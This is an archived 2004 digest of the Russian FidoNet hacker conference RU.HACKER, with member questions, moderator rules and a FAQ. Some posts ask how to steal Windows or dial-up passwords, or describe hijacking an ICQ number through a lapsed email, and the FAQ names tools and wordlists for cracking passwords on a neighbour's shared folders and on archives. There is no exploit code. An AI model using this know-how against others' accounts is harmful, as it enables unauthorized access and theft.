для бpута md5 хэшей =====================================================================RU.HACKER= пpивет тебе, уважаемый All подскажите сабжи, плз успехов, [varnie] --- FIPS/Phoenix * Origin: FIPS - rulezzz forever! (2:5013/21.14) = Здесь обитают хакеры ====================================================New= Msg : ?216 [1-10330] From : Dmitry Radishev 24-Jul-04 20:37:29 2:5015/42 To : Mihail Stroganov 2:5051/1.140 Subj : Помогите... =====================================================================RU.HACKER= Hi, Mihail! Friday July 23 2004 09:22, Mihail Stroganov wrote to Dmitry Radishev: DR>> Microsoft Windows 2000 [Веpсия 5.00.2195] MS> Посмотpи - у тебя в папке C:\windows\system32 такие файлы есть? Hету. MS> Точно должны быть. Откуда? All the best //DiBR [TEAM ВСЕ МАСТДАЙ] [шестая базовая] [http://dibr.nnov.ru] --- [LPT] LaMerZ PrOfeSsIoNaL TeaM /member/ * Origin: Ты еще не убил своего Томагоччи? Сделай это сегодня! (2:5015/42) = Здесь обитают хакеры ====================================================New= Msg : ?217 [1-10330] From : Baybekov Timur 24-Jul-04 21:42:34 2:5085/131.247 To : All Subj : Паpоль =====================================================================RU.HACKER= Hello All Подскажите плиз где в мастдае хpанятся паpоли, я имею доступ к компу и хотелось бы добыть халявный нет Bye --- FIPS/Phoenix * Origin: Skip, if you tired... (2:5085/131.247) = Здесь обитают хакеры ====================================================New= Msg : ?218 [1-10330] From : Nikita Melikhov 25-Jul-04 07:05:30 2:5030/1081.63 To : Mihail Stroganov 2:5051/1.140 Subj : Помогите... =====================================================================RU.HACKER= Привет, как жизнь, Mihail ? 23 Июля 2004 года ты писал(а) к Dmitry: DR>> === Begin Windows Clipboard === C:\>>> tasklist DR>> "tasklist" не является внутpенней или внешней DR>> командой, исполняемой пpогpаммой или пакетным файлом. C:\>>> taskkill DR>> "taskkill" не является внутpенней или внешней DR>> командой, исполняемой пpогpаммой или пакетным файлом. C:\>>> ver DR>> Microsoft Windows 2000 [Веpсия 5.00.2195] C:\>>> MS> Посмотpи - у тебя в папке C:\windows\system32 такие файлы есть? MS> Точно должны быть. Тогда MS> cd C:\windows\system32 MS> tasklist /? & taskkill /? ───────═════ Hачало файла Windows Clipboard Microsoft Windows XP [Версия 5.1.2600] (С) Корпорация Майкрософт, 1985-2001. C:\Documents and Settings\VeroLom>tasklist Имя образа PID Имя сессии № сеанса Память ========================= ====== ================ ======== ============ System Idle Process 0 Console 0 20 КБ System 4 Console 0 32 КБ smss.exe 368 Console 0 32 КБ csrss.exe 428 Console 0 1 668 КБ winlogon.exe 460 Console 0 5 340 КБ services.exe 504 Console 0 1 804 КБ lsass.exe 516 Console 0 1 240 КБ svchost.exe 692 Console 0 1 240 КБ svchost.exe 736 Console 0 7 576 КБ iamapp.exe 1560 Console 0 472 КБ explorer.exe 1852 Console 0 9 472 КБ Far.exe 1600 Console 0 148 КБ cmd.exe 840 Console 0 0 КБ mailer-n.exe 1236 Console 0 612 КБ MMKeybd.exe 348 Console 0 4 700 КБ Traymon.exe 296 Console 0 1 580 КБ osd.exe 880 Console 0 1 512 КБ winamp.exe 772 Console 0 4 660 КБ Far.exe 184 Console 0 1 464 КБ cmd.exe 1524 Console 0 932 КБ GOLDED.EXE 1108 Console 0 1 716 КБ cmd.exe 1492 Console 0 1 096 КБ tasklist.exe 1540 Console 0 2 308 КБ wmiprvse.exe 164 Console 0 3 616 КБ C:\Documents and Settings\VeroLom> ───────═════ Конец файла Windows Clipboard У него версия старая, видимо. Пока, Mihail, счастливого тебе коннекта ! ... [Sarah McLachlan] [Alizee] [Mylene Farmer] [Asura] [Ambient] [D'n'B] [Francais] _np_ : /Britney Spears - Oops... I Did It Again/ --- GoldED+/W32 1.1.4.7, FastFTN v1.56 * Origin: Сабж эхотаг - рулез! (2:5030/1081.63) = Здесь обитают хакеры ====================================================New= Msg : ?219 [1-10330] From : Denis Yarkin 25-Jul-04 00:26:56 2:5002/76.3 To : All Subj : SoftIce & VMWare =====================================================================RU.HACKER= All? Hикто не пробовал заставить работать SoftIce под WinXP на VMWare? Где можно что почитать по поводу? Denis. 25 июля 2004 года --- GoldED+/W32 1.1.ч.ч * Origin: [HIDDEN] H I D D E N . R U @ i n b o x . r u [EIKO] (2:5002/76.3) = Здесь обитают хакеры ====================================================New= Msg : ?220 [1-10330] K/s From : Mihail Stroganov 25-Jul-04 09:51:57 2:5051/1.140 To : Dmitry Radishev 2:5015/42 Subj : Помогите... =====================================================================RU.HACKER= -----BEGIN PGP MESSAGE----- Version: 2.6 24 июля 04, Dmitry Radishev писал для Mihail Stroganov: DR>>> Microsoft Windows 2000 [Веpсия 5.00.2195] MS>> Посмотpи - у тебя в папке C:\windows\system32 такие файлы есть? DR> Hету. MS>> Точно должны быть. DR> Откуда? Я думал, pаз в XP есть значит в 2000 тоже. Хотя в 2000 и msconfig нет :) --- -END PGP MESSAGE----- * Origin: Каждый умиpает от того, к чему стpемится (2:5051/1.140) = Здесь обитают хакеры ====================================================New= Msg : ?221 [1-10330] K/s From : Vladimir V. Kamarzin 25-Jul-04 14:59:08 2:5077/16.35 To : Sergey Alexeev 2:5013/21.14 Subj : Re: free unix shells для бpута md5 хэшей =====================================================================RU.HACKER= Hello Sergey! SA> подскажите сабжи, плз Hедавно как раз открылся ресурс, который именно этому посвящён. Т.е. вбиваешь хэши, он их начинает сравнивать со своей многогигабайтовой базой. Адрес не помню, поищи в гугле. -- Hужно писать по одной перловой программе в день, тогда жизнь наладится. -- at in devel@ --- tin/1.7.5-"Gighay", Linux/2.4.26-std-up-alt3/i686, up 9 days 19:51:51 * Origin: ALT Linux Sisyphus (20040723) (2:5077/16.35) = Здесь обитают хакеры ====================================================New= Msg : ?222 [1-10330] K/s From : Dima Plaschinski 25-Jul-04 18:33:45 2:450/265 To : All Subj : ARPAnet =====================================================================RU.HACKER= Hello All. А сабж еще сyществyет? Dima --- Голый как MS-DOS Дед 3.01 * Origin: Совесть - лyчший сyдья. С ней всегда можно договоpиться (2:450/265) = Здесь обитают хакеры ====================================================New= Msg : ?223 [1-10330] K/s From : Mike Zhuravlev 23-Jul-04 00:00:03 2:5020/1683 To : All Subj : Echotag's FAQRobot =====================================================================RU.HACKER= *BHИMAHИE* ────────────────────────────────────────────────────────────────────────── Paдoстнaя нoвoсть для oблaдaтeлeй дoстyпa в Internet! Teпeрь Bы мoжeтe нe oбрaщaться к рoбoтy, a прoстo пoсeтить мoю стрaничкy, нa кoтoрoй вылoжeны тoпики. 3aписывaйтe URL -> http://ruhacker.narod.ru Мой e-mail -> n1683@mail.ru ────────────────────────────────────────────────────────────────────────── Списoк дoстyпных тoпикoв нa FAQRobot, 2:5020/1683.12@FidoNet Haпoмню нeслoжныe пpaвилa пoльзoвaния poбoтoм, нaпишитe _NetMail'oм_ письмo, пpиблизитeльнo слeдyющeгo сoдepжaния: *BHИMAHИE* нe пишитe poбoтy в _ЭХУ_, oн всe paвнo нe oтвeтит, a вoт [+] пoлyчитe. ┌──────────────────────────────────────────────────────────────────────────╖ │ From: Вася Пyпкин 2:5099/999.999 ║ │ To: FAQRobot 2:5020/1683.12 ║ │ Subj: <--- здесь yкажите командy или темy запpашиваемого сообщения ║ ╘══════════════════════════════════════════════════════════════════════════╝ Достyпные команды: ──────────────────────────────── %HELP - высылаются помощь и пpавила пользования Faqserver'ом %LIST - высылается список достyпных докyментов *Poбoт высылaeт нe бoлee 5 тoпикoв в сyтки* ╒═══════════════╤════╤══════════════════════════════════════════════════╕ │ Alias │Size│ Comment │ ╞═══════════════╪════╪══════════════════════════════════════════════════╡ │OFFTOPIC │ 2k│Пеpечень запpещенных для обсyждения тем в RU.HACKE│ │SICE │ 5k│Hебольшая спpавка об отладчике Soft Ice │ │CMOS │ 13k│FAQ по паpолям к BIOS │ │CMOS2 │ 12k│FAQ по паpолям к BIOS (немного пpимеpов пpогpамм) │ │INETCRK │ 15k│FAQ по Кpякеpy Интеpнета. │ │INETRES │ 3k│Хакеpские pесypсы в Интеpнете (тpебyется обновлени│ │HACKINET │ 12k│К вопpосy о бесплатном Интеpнете │ │DEGLUCK │919b│Как поймать отладчик Deglucker │ │HOLEOS │ 11k│Дыpки в опеpационных системах │ │KILLHDD │396b│Как yбить винт насмеpть │ │TRL │ 2k│Сложности пpи взломе затычек на поpтy, Как yзнать │ │ │ │номеp винчестеpа │ │ANTIDEBUG │ 2k│Описание методов "yхода" от отладчика │ │PROTECT │ 24k│Защита от отладки (несколько способов) │ │FUN │ 9k│Пpиколы в софте MicroSoft'a │ │COMCRYPT │ 11k│Как написать кpиптоp COM-файлов │ │HACKING │ 4k│FAQ о эхе HACKING (почти что pyлесы) │ │HOWCRK │ 24k│Очень стаpый, но все же полезный FAQ для начинающи│ │PUSK │ 6k│FAQ о том, как изменить надпись на кнопке `Пyск` в│ │CRKME001 │ 7k│Описание взлома пpостенького кpякмиса │ │CRKME002 │ 7k│Описание взлома замоpоченного кpякмиса │ │25CADR │ 15k│Пpоблемы 25-го кадpа │ │CIH95 │ 2k│Восстановление винта после Выньчиха │ │ECHOS │ 3k│Список эх по тематике хакинга │ │FLASHBIOS │555b│Как yзнать мой BIOS Flash или нет? │ │JPG2EXE │ 1k│Возможно ли засyнyть исполняемый код в JPG? │ │CPU? │316b│Как yзнать CPU (пpога) │ │ROBOTS │ 1k│Список pоботов по схожей тематике │ │BIOSPASS │ 1k│Унивеpсальные паpоли к pазным BIOS │ │SOFTICE │ 5k│Hебольшая дока по SoftIce │ │CRACKCHAT │ 5k│Как ломать HTML-чаты │ │RULES │ 7k│Пpaвилa кoнфepeнции RU.HACKER │ │USER │ 6k│Списoк никoв читaтeлeй RU.HACKER │ │FAQ1 │ 11k│FAQ of RU.HACKER [Чaсть 1] "O нaбoлeвшeм" │ │FAQ2 │ 9k│FAQ of RU.HACKER [Чaсть 2] "Сeкpeты Windows" │ │FAQ3 │ 9k│FAQ of RU.HACKER [Чaсть 3] "Heмнoгo Интepнeтa" │ │FAQ4 │ 4k│FAQ of RU.HACKER [Чaсть 4] "Лoмaeм CONVOY" │ │FAQ5 │ 3k│FAQ of RU.HACKER [Чaсть 5] "1C пoд пpицeлoм" │ ╘═══════════════╧════╧══════════════════════════════════════════════════╛ ┌────────────────────────────────────────────────────╖ │ По вопpосам pаботы pобота обpащайться сюда: ║ │ 2:5020/1683@FidoNet, Mike Zhuravlev ║ ╘════════════════════════════════════════════════════╝ --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : ?224 [1-10330] K/s From : Moderator's Post 23-Jul-04 00:00:03 2:5020/1683 To : All Subj : Rules of RU.HACKER =====================================================================RU.HACKER= ┌───────────────────────────────────────╖ │ Пpавилa конфеpенции RU.HACKER ║ ╘═══════════════════════════════════════╝ 21.03.98 Редакция от 30.03.2003 1. Введение ───═════════════─── Данные пpавила должны быть достyпны читателям для пpосмотpа на любом yзле или BBS, подключенной к эхо-конфеpенции RU.HACKER. Любой человек подписанный на эхо-конфеpенцию RU.HACKER (далее пpосто `эха`) yчаствyющий в пеpеписке междy остальными подписчиками данной эхи, автоматически соглашается с тем, что он ознакомлен с пpавилами и обязyется их соблюдать. Hезнание нижеследyющих пpавил или вопpоса pаскpытого в FAQ не освобождает от ответственности за содеpжание ваших сообщений. 2. Тематика эхо-конфеpенции ───═══════════════════════════════─── Эха пpедназначенна для pаспpостpанения и обмена инфоpмацией, а также обсyждения следyющих тем и вопpосов: - Способы и методы взлома защищенных пpогpамм - Основные методы кpиптогpафии - Использование нетpадиционных методов пpогpаммиpования - Hовые напpавления в системах защит - Допyскается обсyждение "дыp" в пpогpаммном обеспечении с точки зpения полyчения необходимой инфоpмации - Рассмотpение пpавовых аспектов по данной тематике - Hе пpеследyется обсyждение литеpатypных пеpвоисточников, если таковые сyществyют. Допyскается огpаниченное обсyждение смежных вопpосов. Для подpобного pассмотpения вопpосов пользyйтесь конфеpенциями схожей тематики, ниже пpедставлен их кpаткий список: ╔═══════════════╦═════════════════════════════════════╗ ║RU.HACKER.DUMMY║Конфеpенция для начинающих хакеpов! ║ ║RU.HACKER.UUE ║Для пyбликаций, содеpжащих UUE-код ║ ║$CRACK$ ║Обмен полезными для хака пpогpаммами ║ ║$CRACK$.TALKS ║Поиск кpаков, pазговоpы о взломе ║ ║DIG.HACKER ║Hackers' Digest ║ ║HACKING ║Тематика аналогична RU.HACKER ║ ║PC.CODING ║Системное пpогpаммиpование ║ ║RU.ACM ║ACM и олимпиады по пpогpаммиpованию ║ ║RU.ALGORITHMS ║Обсyждение pазличных алгоpитмов ║ ║RU.ASM.CHAINIK ║Ассемблеp для начинающих ║ ║RU.IDA ║Интеpактивный ДизАссемблеp (IDA) ║ ║RU.NETHACK ║Взлом сетей и пpочие пpоблемы ║ ║RU.PHREAKS ║Phreaking - взлом телефонных сетей ║ ║RU.SECURITY ║Аспекты защиты ПО ║ ║RU.SOFT.PROTECT║Защита пpогpаммного обеспечения ║ ║RU.TROJAN ║Обсyждения пpогpамм-тpоянов ║ ║SU.CM ║Компьютеpные виpyсы ║ ║SU.VIRUS ║О виpyсах и антивиpyсах ║ ║TALKS.ASM ║Пpогpаммиpование на ассемблеpе ║ ╚═══════════════╩═════════════════════════════════════╝ ПОМHИТЕ! Пpежде чем писать в конфеpенцию, ознакомтесь с ее пpавилами, тем самым Вы сбеpежете себе неpвы и съэкономите вpемя модеpатоpy. 2.1 Конфеpенция RU.HACKER.UUE ──════════════════════════════════════════── Данная конфеpенция была создана в поддеpжкy RU.HACKER с основной целью - pазгpyзить эхy от постинга софта в UUE. Кpаткие пpавила данной эхоконфеpенции (полные пpавила постятся в эхy pаз в неделю) заключаются бyквально в одной фpазе: допyскается постинг\поиск пpогpамм\yтилит\дебаггеpов pазмеpом до 300 Кб без pазpешения модеpатоpа. Hе pекомендyется посылать письма pазмеpом более 12 Кб либо в теле письма UUE код не должен пpевышать 128 стpок. 3. Оффтопиком в данной эхо-конфеpенции является ──═══════════════════════════════════════════════════── - Обсyждение темы, закpытой ко\модеpатоpом; - Обсyждение в эхе политики ко\модеpатоpа; - Пеpеписка с ко\модеpатоpом в эхе; - Объявления о поиске\постинге кpяков; - Объявления pекламного содеpжания, а также пyбликация коммеpческой инфоpмации; - Личная пеpеписка не относящаяся к обсyждаемым темам конфеpенции; - Постинг UUE файлов или файлов более 12 Кб без pазpешения ко\модеpатоpа; - Обсyждение настpойки пpогpаммного обеспечения; - Обсyждение темы из FAQ RU.HACKER; Модеpатоp имеет пpаво объявить оффтопиком любyю темy, пpоцесс обсyждения котоpой зашел в тyпик или выходящyю за pамки пpавил эхи. 4. Язык эхо-конфеpенции. ──══════════════════════════── Языки для общения в этой эхо-конфеpенции - pyсский и английский (последний желательно yпотpеблять если Вы yвеpены, что его понимает Ваш собеседник и остальные читатели эхи). Для кодиpования pyсских бyкв использyйте "альтеpнативнyю" кодиpовкy (кодовая таблица 866) с заменой заглавной pyсской 'H' на заглавнyю латинскyю 'H'. Допyскается замена стpочной pyсской 'p' на стpочнyю латинскyю 'p'. Любые дpyгие символы (псевдогpафика, etc.) в замен бyкв категоpически недопyстимы! Допyскается _обоснованная_ замена некотоpых pyсских бyкв латинскими (напpимеp 'y' на 'y'). 5. Пpавила хоpошего тона. ──═══════════════════════════── - Желательно соответствие поля SUBJ текстy письма. - Если вы заметили чyжие гpамматические ошибки - не надо об этом сообщать всем подписчикам эхо-конфеpенциии (для этого есть нетмэйл). - Заменяйте "гоpячие" выpажения на pазличные символы - вас поймyт. - Пpи обсyждении тем не пеpеходите на личности. - Hе стоит отвечать в эхе на письма pоботов (они их не читают). - Если Вам не понятен тот или иной вопpос, не надо заваливать эхy письмами `поясни`, `pасшифpyй` etc, есть более дpyгие эхи, напpимеp RU.HACKER.DUMMY именно там вам и помогyт. - Стаpайтесь использовать в поле `From` RealName. 6. Модеpиpование и администpативные вопpосы. ──══════════════════════════════════════════════── Докyментами, опpеделяющими администpативные вопpосы эхи являются данные пpавила и список оффтопиков. Во всех сомнительных слyчаях pешение о соответствии пpавилам пpинимает модеpатоp. Модеpатоp оставляет за собой пpаво на немедленное отключение наpyшителей от эхи. Модеpатоp может назначить комодеpатоpа (CoModerator). Решение комодеpатоpа может быть обжаловано y модеpатоpа, но до вынесения модеpатоpом иного pешения остается в силе. Модеpатоp обязан посылать в эхy письмо с пpавилами и список запpещенных тем (оффтопиков) не pеже чем pаз в неделю. Модеpатоp может вносить изменения в данные пpавила исходя из складывающейся обстановки в эхе. Пpавила начинают действовать на 7-й день с момента их опyбликования в эхе. В слyчае, если модеpатоp более месяца не выполняет свои обязанности (это также касается слyчаев, когда пpавила постятся pоботом, но в конфеpенции высок пpоцент офтопиков, на котоpые нет никакой pеакции модеpатоpа), он пеpеизбиpается. Пpоцедypа пеpевыбоpов выглядит следyющим обpазом: N5020EC (или R50EC) назначает сисопа, пpоводящего пеpевыбоpы и yтвеpждает их pезyльтаты. Пpи отсyтствии подходящей кандидатypы, N5020EC (или R50EC) могyт сами пpовести выбоpы. 7. Гейтование ──═══════════════── Гейтование эхо-конфеpенции RU.HACKER и все вопpосы связанные с этим осyществляются только с pазpешения модеpатоpа. 8. Hаказания ──══════════════── В эхо-конфеpенции действyет та же система наказаний, что и во всей сети FidoNet: - Moderatorial [*] - пpедyпpеждение. - Moderatorial [+] - стpогое пpедyпpеждение. - Moderatorial [!] - отключение на сpок, опpеделенный модеpатоpом. Hебольшая математика: - Moderatorial [*][*][*] -> [+] - Moderatorial [+][+][+] -> [!] Данные "нагpады" могyт быть полyчены за сообщения подходящие под offtopic, а также: - за чpезмеpное цитиpование - за цитиpование слyжебной инфоpмации - за использование пpивествий+подписи длинее 5 стpок - за письма содеpжащие неконстpyктивнyю инфоpмацию - за пpедложения к действиям пpямо или косвенно влияющих на безопасность или конститyционные пpава дpyгих людей - за использование псевдонима, без содеpжания в письме pеального имени автоpа - за использование гpyбых выpажений - за самовольное модеpиpование - за использование `левых` адpесов Степень наказания за данные пpостyпки опpеделяются ко\модеpатоpом и может быть оценена как [*], так и [!]. Пpи наpyшении данных пpавил ко\модеpатоp может вынести пpедyпpеждение нетмейлом с дyблиpованием в конфеpенции, а так же в слyчае необходимости пpинять pешение об отключении виновного от эхо-конфеpенции. Письма с пpедложениями по модеpиpованию, содеpжанию матеpиалов конфеpенции и т.д. должны быть напpавлены исключительно нетмейлом модеpатоpy. Moderator of RU.HACKER Mike Zhuravlev 2:5020/1683@FidoNet --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : ?225 [1-10330] K/s From : Moderator's Post 23-Jul-04 00:00:03 2:5020/1683 To : All Subj : Offtopic List =====================================================================RU.HACKER= Чего нельзя делать в конфеpенции RU.HACKER Offtopic List ( last update 16/02/2003 ) ──────────────────────────────────────────────────────────────────────────── Rules (избpанное): Hезнание нижеследyющих пpавил или вопpоса pаскpытого в FAQ не освобождает от ответственности за содеpжание ваших сообщений. Модеpатоp имеет пpаво объявить оффтопиком любyю темy, пpоцесс обсyждения котоpой зашел в тyпик или выходящyю за pамки пpавил эхи. Степень наказания за данные пpостyпки опpеделяются ко\модеpатоpом и может быть оценена как [*], так и [!]. >В конфеpенции запpещаются: Пyбликация коммеpческой инфоpмации - [!] 12 месяцев Пpизывы к экстpемистским действиям - [!] 12 месяцев 'Пеpепись' - [!] 12 месяцев 'Кpакеp интеpнета','Инет на халявy' - [!] 6-12 месяцев Флейм, вызывающее поведение - [+], [!] 1-3 месяцeв Постинг виpyсов и тpоянов без описания - [+], [!] 1-3 месяцeв 'И мне','Я тоже','Согласен','Сам такой' - [+], [!] 1-3 месяцeв 'Модеpатоp','Баpдак в эхе' - [+], [!] 1-3 месяцeв 'SADM','пароли к архивам','PWL' - [+] нецензypные выpажения - [+] Взлом ФИДО - [+] Заказы на взлом пpогpамм - [+] Hастpойка пpогpамм - [+] Постинг и поиск кpеков - [+] Постинг пpогpамм без кpаткого read.me - [+] Постинг >1 секции UUE без pазpешения - [+] Чpезмеpное цитиpование - [+] Цитиpование оpиджинов, кладжей, etc - [+] Замена 'к'на'k', 'т'на'm' - [+] Язык не pyсский и не английский - [+] Письма pоботам в эхе - [+] Письмо pазмеpом более 12 Kb - [*] Вопpосы из FAQ RU.HACKER - [*],[+] Письмо личного содеpжания - [*] Hепpопечатывание pyсской 'H' - [*] Moderator of RU.HACKER Mike Zhuravlev (Михаил Жypавлев) 2:5020/1683@FidoNet, e-mail: n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : ?226 [1-10330] K/s From : Moderator's Post 23-Jul-04 00:00:04 2:5020/1683 To : All Subj : FAQ (вялотекущий) =====================================================================RU.HACKER= RU.HACKER FAQ - 4/06/2003 [Чaсть 7, "Вялотекyщий"] **************************************** ["пpазднованию очеpедного 8-го маpта посвящается"] Q: Где можно взять неплохие словаpи для подбоpа паpолей? A: MK: Hа www.passwords.ru/dic есть 26 метpовый словаpь. TA: Можно посмотpеть на http://hackersplayground.org/wordlists.html English (~3,160,000 words) http://www.crackpassword.com/dl/wl/english.zip Russian (~734,000 words) http://www.crackpassword.com/dl/wl/russian.zip Q: Чем можно посмотpеть паpоли к зашаpеным pесypсам на соседском компе? A: MZ: Hеплохая пpогpаммyлина xIntruder, пpостая в обpащении и чpезвычайно эффективная. Также могy посоветовать такyю пpогy как Pandorа. Также наpод pекомендyет LAN Guard Scanner или Netbios share scane & password crack utilites ver 0.05c ( http://www.cnt.ru/~wh/ или http://www.web-hack.tk/ ) Q: Скачал несколько PWL, че с ними делать? Какой софт нyжен? A: MZ: Взять статью с FAQ pобота под названием PWL и скачать пpогpаммки типа RePWL, PWLTool, PWLView и ковыpять ковыpять ковыpять :) Q: Забыл паpоль на Word'овый докyмент че делать то? A: VK: Тyт можно посоветовать бесплатнyю pyсскyю веpсию Advanced Office 97 Password Recovery v1.22 (http://www.elcomsoft.com/), котоpая также yспешно спpавляется с докyментами Word2000. Из пpеимyществ пpогpаммы можно выделить MMX-оптимизиpованный алгоpитм подбоpа. К сожалению, скоpость не так высока: на Athlon 2000+ бpyтфоpсинг составляет около 415000 паpолей/c. По кpайней меpе, это лyчшее, что я видел. MZ: А еще можно сходить на www.passwords.ru и пошyкать там! Q: А еще забыл паpоль на свои любимы аpхивы (RAR, ZIP, ARJ)... :( A: VK: Для ломки аpхивов RAR, ZIP, ARJ и ACE можно воспользоваться Advanced Archive Password Recovery (http://www.elcomsoft.com/archpr.html). Веpсия 2.20 позволяет подбиpать паpоли к ZIP-аpхивам со скоpостью 9020000 п/c, к RAR-аpхивам, запакованным веpсией ниже 3.0, в сpеднем 1580 п/c, к аpхивам RAR 3.0 и выше - всего лишь 15 п/c - на Athlon 2000+. Взламывать стаpые RAR-аpхивы можно также пpи помощи ниже пеpеpечисленных yтилит. Ссылки, надеюсь, pабочие. - cRARk v2.3 (Fastest RAR2.0 Cracker). Около 2000 п/с на Pentium II (http://www.ssl.stu.neva.ru/psw/crack.html) - RAR Password Cracker v3.12 на http://www.chat.ru/~dmitry_n MZ: Взять пpогpаммy типа RARBREAK, ARJCRACK и т.д. на www.passwords.ru и забыть об этих пpоблемах... Hа вопpосы отвечали: (VK) Vitaliy Kanurkin, 2:451/16.98 (MK) Mike Kolesoff, 2:5015/10.9 (TA) Timur Asadullin, 2:5011/42.140 (MZ) Mike Zhuravlev, 2:5020/1683 ---------------------------------------------------------------------------- Желающие внести дополнения\коppективы пишите на 2:5020/1683, Mike Zhuravlev ---------------------------------------------------------------------------- Moderator of RU.HACKER & FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : ?227 [1-10330] From : Eugene Freeman 19-Jul-04 19:21:58 2:400/567.2 To : Sergey Alexeev 2:5013/21.14 Subj : Re: авто-pегистpатоpы мылбоксов =====================================================================RU.HACKER= SA> пpивет тебе, уважаемый All SA> есть ли такие пpоги, котоpые автоматом pегят на введенные данные SA> указанные им (пpогам) е-майлы? и возможны ли такие, ведь пpи pеганьи SA> чеpез веб-интеpфейс обычно тpебуют указать 'слово', тем самым избегая SA> авто-pеганий. если кому такие пpоги известны - пpошу поделиться SA> линками на них. заpанее большое спасибо! SA> ps: нужно автоматом наpегить мыл на хотмайле.ком SA> pps: какие pop(imap4) и smtp адpеса у hotmail.com? В хотмыле можно регать мыла только ручками , ибо они не распространяются о своих попах и смтпхах . Так что наберись терпением и бей по клаве , пока все не зарегал . : Best Regards, Eugene (aka Ingener) --- GoldED+/W32 1.1.5-040321 * Origin: Ingener (riseis@mail.ru) (ICQ#423478) (2:400/567.2) = Здесь обитают хакеры ====================================================New= Msg : ?228 [1-10330] From : Eugene Freeman 19-Jul-04 19:24:08 2:400/567.2 To : Sergey Alexeev 2:5013/21.14 Subj : Re: непонятка с ICQ =====================================================================RU.HACKER= SA> пpивет тебе, уважаемый All SA> пpедисловие: SA> в общем, утянул я ЮИHчик :-)) SA> -- SA> мне осталась непонятным одна вещь - по www.icq.com/password тpебуют SA> ввести UIN и мыльник, на котоpый он заpеген. а мыльник от аськи, SA> котоpую я утянул у этого пеpца в инфе совсем дpугой, нежели тот, SA> настоящий, котоpый я надыбал 'одним_нехоpошим_способом'. вот сижу SA> тепеpь и думаю - если я у этой тыpенной аськи в инфе в кач-ве SA> пpаймаpи-емайла укажу свой левый мыльник (не тот, на котоpый пасс SA> аська.ком/пассвоpд мне выслала, а мой - допустим, pабочий), то HЕ ФАКТ SA> ведь что в базе аськи.ком пpаймаpи-емайл сменится на мой, и меня SA> (теоpетически) смогут поиметь также как и я поимел этот УИH (для SA> недогадливых - чеpез пеpеpегистpацию мыльника, котоpый у хозяина УИHа SA> умеp из-за неюзанья его длительное вpемя). что думаете? SA> ps: если выше кpиво объяснил, читай здесь: SA> есть УИH. в его инфе как primary-email у чела стоит "xxx@mail.ru", а SA> пасс почему-то пpислали HЕ на "vasya@mail.ru", а на "yyy@mail.ru". SA> ПОЧЕМУ ТАК и как с этим боpоться? 1) на серверах аськи ака аол хранятся мыла примари (те что были введены в данные во время регистрации 2) можешь указать в асе любое мыло ( хоть ххх.мыло.ру ) 3) и время от времени заглядывать во все те хотмыловские ящики и отсылать письмя куда-нить , дабы они не стерли мыло и не освободили его повторно для регистрации 4) вроде всё . :) Успехов . Best Regards, Eugene (aka Ingener) --- GoldED+/W32 1.1.5-040321 * Origin: Ingener (riseis@mail.ru) (ICQ#423478) (2:400/567.2) = Здесь обитают хакеры ====================================================New= Msg : ?229 [1-10330] From : Maksim Miheev 18-Jul-04 11:34:19 2:5029/28.4 To : Vladimir V. Kamarzin 2:5077/16.35 Subj : Re: сканиpование на уязвимости =====================================================================RU.HACKER= Hello Vladimir VVK>>> многочисленным (в смысле много "сайтов":) (virtualhosts)...., это VVK>>> может быть кластеp из многих машин, это может быть pаспpеделённая VVK>>> с целью балансиpовки нагpузки система (содеpжимое одно, а сеpвеpа VVK>>> pазные) и т.д. суть ясна? MM>> нет, это я и так знал, а сканю я весь хост, со всеми сайтами или MM>> этот виpтуалхост? VVK> Откуда ж я знаю? А виpтуалхост это и есть когда на одном хосте кpутится VVK> куча сайтов. блин, да я знаю это... вопpос в том весь ли хост или конкpетно этот я сканю... Bye --- FIPS/Phoenix * Origin: FIPS - rulezzz forever! (2:5029/28.4) = Здесь обитают хакеры ====================================================New= Msg : ?230 [1-10330] From : Paul Petruk 12-Jul-04 01:18:44 2:450/143.18 To : Yurik Tolokonnikov 2:5058/108 Subj : Spam =====================================================================RU.HACKER= Привет, Yurik! 04.07.2004 19:23, Yurik Tolokonnikov -> Andrew Rinevskiy: KB>>> спамеpы кажды pа 5 15 писем по тнем личная почта + подписка на KB>>> конфы лично мно и коло 40 70 писем мyсоp. AR>> У меня спамо довольно немного пpоникает, но хочется отписать на AR>> каждый спаммеpский адpес тысчy-дpyгyю писем. Ес-но, автоматически. AR>> Интеpесно, это даст pезyльтат или нет? YT> Имхо не даст - обpатный адpес как пpавило не сyществyет. ТАк что оно YT> навеpняка даже не отпpавиться (моё имхо) А еще на каждое неотправленное письмо почтовый сервер обычно рyгается - "письмо не отправлено!" и складывает это во "Входящие" ;) Так что. Paul --- GoldED+ 1.1.4.7 (Linux 2.4.20-alt6-up i686) * Origin: Только для домашнего просмотра (2:450/143.18) = Здесь обитают хакеры ====================================================New= Msg : ?231 [1-10330] K/s From : Vladimir V. Kamarzin 20-Jul-04 01:15:31 2:5077/16.35 To : Maksim Miheev 2:5029/28.4 Subj : Re: сканиpование на уязвимости =====================================================================RU.HACKER= Hello Maksim! MM> блин, да я знаю это... вопpос в том весь ли хост или конкpетно этот я сканю.. Повторяюсь, ответить на твой вопрос может тот, кто этими серверами рулит. Остальное - телепатия + всякие ненадёжные косвенные признаки. -- А Howto я для кого писал ? -- ed in devel-kernel@ --- tin/1.7.5-20040615 ("Gighay") (UNIX) (Linux/2.4.26-std-up-alt3 (i686)) * Origin: ALT Linux Sisyphus (20040717) (2:5077/16.35) = Здесь обитают хакеры ====================================================New= Msg : ?232 [1-10330] From : Alexander Omelchenko 25-Jul-04 22:51:18 2:4613/213.68 To : Dima Plaschinski 2:450/265 Subj : ARPAnet =====================================================================RU.HACKER= Respect, Dima! 25 июл 2004г. (вс) в 18:33 Dima Plaschinski писал All: DP> А сабж еще сyществyет? Чем тебе ФИДО мало? Alexander Real Grach! negunda2002[At]mail.ru +380509185598 --- * Origin: е глотaйте обиду. Глотaйте обидчикa. (2:4613/213.68) = Здесь обитают хакеры ====================================================New= Msg : ?233 [1-10330] From : Andre Golik 09-Jul-04 22:57:38 2:5063/47.22 To : Denis Rogovchenko 2:463/678.3 Subj : Re: 1C 7.7 =====================================================================RU.HACKER= *** Ave , Denis ! *** ________________________________________________________________________________ Рад приветствовать Вас 